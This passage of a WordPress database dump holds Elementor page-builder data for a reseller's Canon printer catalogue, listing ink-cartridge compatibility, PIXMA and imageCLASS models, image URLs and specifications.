width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Photo Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Photo Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS9570<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-781 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780XL (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(7073,3324,'_wp_page_template','template-fullwidth.php'),(7074,3324,'_elementor_edit_mode','builder'),(7075,3324,'_elementor_template_type','post'),(7076,3324,'_elementor_data','[{\"id\":\"9ac79cf\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"2a109eb\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9d59285\",\"elType\":\"widget\",\"settings\":{\"title\":\"Injet Printers :-\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca9ead8\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"9a9d292\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"align\":\"center\"},\"elements\":[{\"id\":\"6ad8678\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA E560 \\/ E560R\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e70128a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2.png\",\"id\":2345}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"509ac9b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Advanced Wireless All-In-One with Auto Duplex\\u00a0Printing for Low-Cost Printing<\\/p><p>The Ink Efficient E560 \\/ E560R is designed to give you an affordable wireless printing experience at low running cost of up to 800 pages.<\\/p><p>Available in Black and Red.<\\/p><p>Print, Scan, Copy<\\/p><p>ISO Standard print speed (A4): up to 9.9ipm black \\/ 5.7ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi<\\/p><p>Recommended print volume: 80 - 400 pages<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"1ba38c4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"9b84d1c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"11\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"37\",\"right\":\"37\",\"bottom\":\"37\",\"left\":\"37\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"19ec1cd\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"d3a1ece\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA E4270\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"47167d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1.png\",\"id\":2346}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"c56690e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Compact Wireless All-In-One with Fax and automatic 2-sided printing for Low-Cost Printing<\\/p><p>This compact Office All-In-One features a 20-sheet Auto Document Feeder for productivity and delivers up to 400 pages yield with high-capacity ink cartridges.<\\/p><p>Print, Scan, Copy, Fax<\\/p><p>ISO standard print speed (A4): 8.8ipm black \\/ 4.4ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Wireless Direct<\\/p><p>Recommended print volume: 50 - 200 pages<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"189f9a2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"df0825f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center><span style=\\\"font-size: 0.875rem;\\\">[maxbutton id=\\\"11\\\" ]<\\/span><\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"31\",\"right\":\"31\",\"bottom\":\"31\",\"left\":\"31\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"692b43d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"a99e262\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA TS9570\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6a04479\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3.png\",\"id\":2347}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6ab42ff\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>A3 Wireless Photo Printer with Large 4.3\\u201d Touch-Screen and Auto Document Feeder<\\/p><p>This A3 wireless compact Photo All-In-One printer combines amazing compactness and a wide range of printing options for the complete home and small office printing experience.<\\/p><p>Print, Scan, Copy<\\/p><p>ISO standard print speed (A4): up to 15.0ipm black \\/ 10.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, wired LAN, memory card slot, wireless\\/wired LAN PictBridge, Mopria, AirPrint, BLE, Wireless Direct<\\/p><p>Recommended print volume: 80 - 300 pages<\\/p><center>[maxbutton id=\\\"11\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"657c5e2\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"1c9048c\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA TS8270\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e5da999\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1.png\",\"id\":2348}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"8c06b04\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Wireless Photo All-In-One with Large 4.3\\u201d Touch-Screen and Auto Duplex Printing<\\/p><p>This advanced wireless Photo All-In-One is beautifully designed with a wide range of printing options for the complete home printing experience.<\\/p><p>Available in Black, Red and White.<\\/p><p>Print, Scan, Copy<\\/p><p>ISO standard print speed (A4): up to 15.0ipm black \\/ 10.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, memory card slot, wireless Pictbridge, Mopria, AirPrint, BLE, Wireless Direct<\\/p><p>Recommended print volume: 30 - 100 pages<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"89b9be8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center><\\/center><center><\\/center><center><\\/center><center><\\/center><center><\\/center><center>[maxbutton id=\\\"11\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"11\",\"right\":\"11\",\"bottom\":\"11\",\"left\":\"11\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e19c5ed\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"48b8328\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"619d0d9\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G2010\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b641ed3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1.png\",\"id\":2349}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"cb6e9e3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank All-In-One for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost<\\/p><p>Print, Scan &amp; Copy<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm black \\/ 5.0ipm colour<\\/p><p>Hi-speed USB 2.0<\\/p><p>Recommended print volume: 150 - 1500 pages<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f95d9d7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"11\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ef95652\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"72caeea\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G4010\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1a96790\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/095399e7118a4e898b6df8c1808358de_g4010_03.png\",\"id\":2351}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"bc59f5a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank All-In-One for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost.<\\/p><p>Print, Scan, Copy and Fax<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm black \\/ 5.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Access Point Mode<\\/p><p>Recommended print volume: 150 - 1500 pages<\\/p><center>[maxbutton id=\\\"11\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"49effc0\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"79b85a4\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G1010\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4266d0e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4.png\",\"id\":2352}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"79cfa28\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank Printer for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost<\\/p><p>Print<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm (mono) \\/ 5.0ipm (colour)<\\/p><p>Photo Speed (4 x 6\\\"): 60sec. (borderless)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"23b0d26\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"15\",\"right\":\"15\",\"bottom\":\"15\",\"left\":\"15\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"137f63f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"11\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"28\",\"right\":\"28\",\"bottom\":\"28\",\"left\":\"28\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"35746a1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"9b7f21a\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G3010\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b8c2962\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/abbc0420f899426c86b9f547f8e0476d_g3010_01.png\",\"id\":2721}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"ca1fadd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank Wireless All-In-One for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost<\\/p><p>Print, Scan &amp; Copy<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm black \\/ 5.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, Mopria, Access Point Mode<\\/p><p>Recommended print volume: 150 - 1500 pages<\\/p><center>[maxbutton id=\\\"11\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1ffb94f\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"84b94b6\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"130ead1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Laser Printers :-\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"219f45c\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"39c2015\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ece285e\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS LBP113w\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1273d18\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1.png\",\"id\":2724}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6b60692\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><p class=\\\"sub-title\\\"><strong>Compact with wireless connectivity<\\/strong><\\/p><\\/div><p>Simple to operate and compact in size, the ideal choice for your printing needs.<\\/p><ul class=\\\"list-normal\\\"><li>Print<\\/li><li>Print Speed (A4): Up to 22ppm<\\/li><li>Recommended monthly print volume: 250 - 2,500 pages<\\/li><li>First Print Out Time (A4): Approx. 6.5 sec<\\/li><li>Print resolution: Up to 2,400 (equivalent) \\u00d7 600 dpi<\\/li><li>Mobile Connectivity.<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e0baf05\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"23\",\"right\":\"23\",\"bottom\":\"23\",\"left\":\"23\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"c3f6907\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"11\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"50\",\"bottom\":\"50\",\"left\":\"50\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f6acb91\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"001a8d3\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF269dw\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1a672fd\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/14e8362b0db44a5daaf2af034760fc58_MF269dw-1.png\",\"id\":2725}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"fb9d4fc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\">\\n<p class=\\\"sub-title\\\"><strong>The Multifunction printing solution with Duplex Auto Document Feeder (DADF)<\\/strong><\\/p>\\n\\n<\\/div>\\nEnjoy greater efficiency. With the duplex auto document feeder, ensure shorter copying and scanning times.\\n<ul class=\\\"list-normal\\\">\\n \\t<li>Print, Scan, Copy, Fax<\\/li>\\n \\t<li>Print Speed (A4): Up to 28ppm<\\/li>\\n \\t<li>Recommended monthly print volume: 250 - 2,500 pages<\\/li>\\n \\t<li>FPOT: Approx. 5.2 sec<\\/li>\\n \\t<li>Max. paper input capacity: 251 sheets<\\/li>\\n \\t<li>Print resolution: 1,200 \\u00d7 1,200 dpi (equivalent)<\\/li>\\n<\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"4f2ce8e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"15\",\"right\":\"15\",\"bottom\":\"15\",\"left\":\"15\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"2a9b750\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"11\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"13\",\"right\":\"13\",\"bottom\":\"13\",\"left\":\"13\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1f6f8ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"a880ac9\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF266dn\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"d63382c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/f8389aa599cc42db986e698ac364f9fc_MF266dn-1.png\",\"id\":2726}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"73a1481\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\">\\n<p class=\\\"sub-title\\\"><strong>The Multifunction printing solution with Mobile Printing and Network<\\/strong><\\/p>\\n\\n<\\/div>\\nFeaturing Network printing and SEND technology, MF266dn is the productive choice for your business operations.\\n<ul class=\\\"list-normal\\\">\\n \\t<li>Print, Scan, Copy, Fax<\\/li>\\n \\t<li>Print Speed (A4): Up to 28ppm<\\/li>\\n \\t<li>Recommended monthly print volume: 250 - 2,500 pages<\\/li>\\n \\t<li>FPOT: Approx. 5.2 sec<\\/li>\\n \\t<li>Max. paper input capacity: 251 sheets<\\/li>\\n \\t<li>Print resolution: 1,200 \\u00d7 1,200 dpi (equivalent)<\\/li>\\n<\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"2fabcd2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"15\",\"right\":\"15\",\"bottom\":\"15\",\"left\":\"15\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"0a62d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"11\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"13\",\"right\":\"13\",\"bottom\":\"13\",\"left\":\"13\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0e45d15\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"04de22f\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF913w\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"790e84e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/7583474b04984f42b18e94fe91075ec9_MF913w-1.png\",\"id\":2727}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"880dc7e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\">\\n<p class=\\\"sub-title\\\"><strong>Compact All-in-One with wireless connectivity, bundled with three toner cartridges<\\/strong><\\/p>\\n\\n<\\/div>\\nSimple solution to your print, scan and copy needs. The small footprint fits desktops with limited space perfectly. Bundled with 3 toners, you can print up to 7,500 pages with low cost per print.\\n<ul class=\\\"list-normal\\\">\\n \\t<li>Print, Scan, Copy<\\/li>\\n \\t<li>Print Speed (A4): Up to 22ppm<\\/li>\\n \\t<li>Recommended monthly print volume: 250 - 2,500 pages<\\/li>\\n \\t<li>FPOT: Approx. 6.5 sec<\\/li>\\n \\t<li>Max. paper input capacity: Up to 150 sheets<\\/li>\\n \\t<li>Print resolution: Up to 2,400 (equivalent) \\u00d7 600 dpi<\\/li>\\n<\\/ul>\\n<center>[maxbutton id=\\\"11\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bdfedb6\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"55572b6\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"00c113d\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF113w\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"77e13da\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/e2fa8e1c70b54636a6922a5d483f3250_MF113w-2.png\",\"id\":2728}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"2036878\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\">\\n<div class=\\\"overview-head\\\">\\n<div class=\\\"overview-head\\\">\\n<p class=\\\"sub-title\\\"><strong>Compact All-in-One with wireless connectivity<\\/strong><\\/p>\\n\\n<\\/div>\\nSimple solution to your print, scan and copy needs. The small footprint fits desktops with limited space perfectly. Equipped with built-in Wi-Fi and access point capability.\\n<ul class=\\\"list-normal\\\">\\n \\t<li>Print, Scan, Copy<\\/li>\\n \\t<li>Print Speed (A4): Up to 22ppm<\\/li>\\n \\t<li>Recommended monthly print volume: 250 - 2,500 pages<\\/li>\\n \\t<li>FPOT: Approx. 6.5 sec<\\/li>\\n \\t<li>Max. paper input capacity: Up to 150 sheets<\\/li>\\n \\t<li>Print resolution: Up to 2,400 (equivalent) \\u00d7 600 dpi<\\/li>\\n<\\/ul>\\n<center>[maxbutton id=\\\"11\\\" ]<\\/center>\\n\\n<\\/div>\\n<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"cd5acb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"7671e33\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS LBP913w\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"d405a8d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1.png\",\"id\":2730}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9ac8d27\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\">\\n<div class=\\\"overview-head\\\">\\n<p class=\\\"sub-title\\\"><strong>Compact with wireless connectivity, bundled with 3 cartridges<\\/strong><\\/p>\\n\\n<\\/div>\\nKeep printing simple. The compact size fits desktops with limited space perfectly. Bundled with 3 toners, you can print up to 7,500 pages with low cost per print.\\n<ul class=\\\"list-normal\\\">\\n \\t<li>Print<\\/li>\\n \\t<li>Print Speed (A4): Up to 22ppm<\\/li>\\n \\t<li>Recommended monthly print volume: 250 - 2,500 pages<\\/li>\\n \\t<li>First Print Out Time (A4): Approx. 6.5 sec<\\/li>\\n \\t<li>Print Resolution: Up to 2,400 (equivalent) \\u00d7 600 dpi<\\/li>\\n \\t<li>Mobile Printing<\\/li>\\n<\\/ul><\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"dfd3898\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"11\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98ff69a\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"9dc3933\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS 